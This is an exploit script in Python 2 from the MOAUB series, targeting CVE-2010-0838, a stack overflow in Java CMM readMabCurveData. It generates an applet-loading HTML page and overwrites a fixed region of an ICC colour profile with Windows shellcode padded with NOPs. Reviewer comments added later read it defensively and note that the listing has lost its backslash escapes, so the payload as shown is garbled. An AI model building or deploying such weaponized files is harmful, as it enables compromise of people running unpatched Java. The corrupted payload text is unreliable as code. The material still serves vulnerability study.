# Title : MOAUB #20 - Java CMM readMabCurveData Stack Overflow
# Published : 2010-09-20
# Author : Abysssec
'''
__ __ ____ _ _ ____
| / |/ __ / | | | | _
| / | | | | / | | | | |_) |
| |/| | | | |/ / | | | | _ <
| | | | |__| / ____ |__| | |_) |
|_| |_|____/_/ _____/|____/
'''
'''
Title : Java CMM readMabCurveData stack overflow
Version : Java runtime < 6.19
Analysis : http://www.abysssec.com
Vendor : http://www.java.com
Impact : Critical
Contact : shahin [at] abysssec.com , info [at] abysssec.com
Twitter : @abysssec
CVE : CVE-2010-0838
MOAUB Number : MOAUB_20_BA
http://www.exploit-db.com/moaub-20-java-cmm-readmabcurvedata-stack-overflow/
http://www.exploit-db.com/sploits/moaub-20-exploit.zip
'''
import sys
def main():
    """Build the two proof-of-concept artefacts for CVE-2010-0838.

    Writes ``index.html`` (a page that loads the ``Curve.class`` applet) and
    rewrites ``kodak.icm`` in the current directory so that a fixed 494-byte
    region of the file is replaced by the payload. Takes no arguments and
    returns ``None``; on ``IOError`` it prints a message and exits with
    status -1.

    Reviewer notes (defensive reading):
      * This is Python 2 source (``print`` statements).
      * The listing on this page has lost its indentation, and the payload
        literals appear to have lost their backslash escapes, so the text
        shown here is not a faithful copy of the original script.
      * Per the header on this page, the affected population is Java
        runtimes older than the version given there; updating the JRE is
        the remediation.
    """
    try:
        # Landing page: the APPLET tag makes the Java plug-in load
        # Curve.class. Curve.class is not part of this listing; presumably
        # it is what opens the colour profile - confirm against the archive
        # referenced in the header.
        strHTML = '''
<HTML>
<HEAD>
</HEAD>
<BODY>
<H1>You have exploited!!!</H1>
<P><APPLET code="Curve.class" WIDTH="600" HEIGHT="400">
</APPLET></P>
</BODY>
</HTML> '''
        fHTML = open('index.html', 'w')
        fHTML.write(strHTML)
        fHTML.close()
        # Read the whole template profile into memory. kodak.icm must already
        # exist next to the script; a missing file raises IOError, which the
        # handler below catches.
        fdR = open('kodak.icm', 'rb+')
        strTotal = fdR.read()
        # Keep everything before offset 9154 and everything from offset 9648
        # on. The gap is 9648 - 9154 = 494 bytes, matching the 494 limit
        # enforced below, so a full-length payload leaves the file size
        # unchanged.
        str1 = strTotal[:9154]
        str2 = strTotal[9648:]
        # Opaque payload bytes from the original author.
        # NOTE(review): as rendered here the literal contains no backslash
        # escapes, so it is plain text and len() counts characters, not
        # bytes. The hex digits include the ASCII for "The exploit was
        # successful!" and "USER32", which suggests a message-box
        # demonstration payload - not verified here.
        shellcode = 'xEBx6Bx5Ax31xC9x6Ax10x52x42x52x51xFFxD0x53x68x7ExD8xE2x73xFFxD6x6Ax00xFFxD0xFFxD7x50x68xA8xA2x4DxBCxFFxD6xE8xDAxFFxFFxFFx00x54x68x65x20x65x78x70x6Cx6Fx69x74x20x77x61x73x20x73x75x63x63x65x73x73x66x75x6Cx21x00x5Ex6Ax30x59x64x8Bx19x8Bx5Bx0Cx8Bx5Bx1Cx8Bx1Bx8Bx5Bx08x53x68x8Ex4Ex0ExECxFFxD6x89xC7xE8xB3xFFxFFxFFx55x53x45x52x33x32x00xE8xD3xFFxFFxFFx53x55x56x57x8Bx6Cx24x18x8Bx45x3Cx8Bx54x05x78x01xEAx8Bx4Ax18x8Bx5Ax20x01xEBxE3x32x49x8Bx34x8Bx01xEEx31xFFxFCx31xC0xACx38xE0x74x07xC1xCFx0Dx01xC7xEBxF2x3Bx7Cx24x14x75xE1x8Bx5Ax24x01xEBx66x8Bx0Cx4Bx8Bx5Ax1Cx01xEBx8Bx04x8Bx01xE8xEBx02x31xC0x5Fx5Ex5Dx5BxC2x08x00'
        # The replaced region is fixed-size, so an over-long payload is
        # rejected. NOTE(review): this early return leaves fdR open.
        if len(shellcode) > 494:
            print "[*] Error : Shellcode length is long"
            return
        # Pad a shorter payload up to the region size, one unit per
        # iteration. This test is always true once the guard above has
        # passed.
        if len(shellcode) <= 494:
            dif = 494 - len(shellcode)
            while dif > 0 :
                shellcode += 'x90'
                dif = dif - 1
        # Re-open the same path for writing; 'wb+' truncates the file, which
        # is safe only because its content is already held in strTotal.
        # fdR is still open on the same file at this point.
        fdW= open('kodak.icm', 'wb+')
        fdW.write(str1)
        fdW.write(shellcode)
        fdW.write(str2)
        fdW.close()
        fdR.close()
        print '[-] Html file generated'
    except IOError:
        # Any file open/read/write failure above lands here; the process
        # exits with a non-zero status.
        print '[*] Error : An IO error has occurred'
        print '[-] Exiting ...'
        sys.exit(-1)
# Script entry point: run main() only when executed directly, not on import.
if __name__ == '__main__':
    main()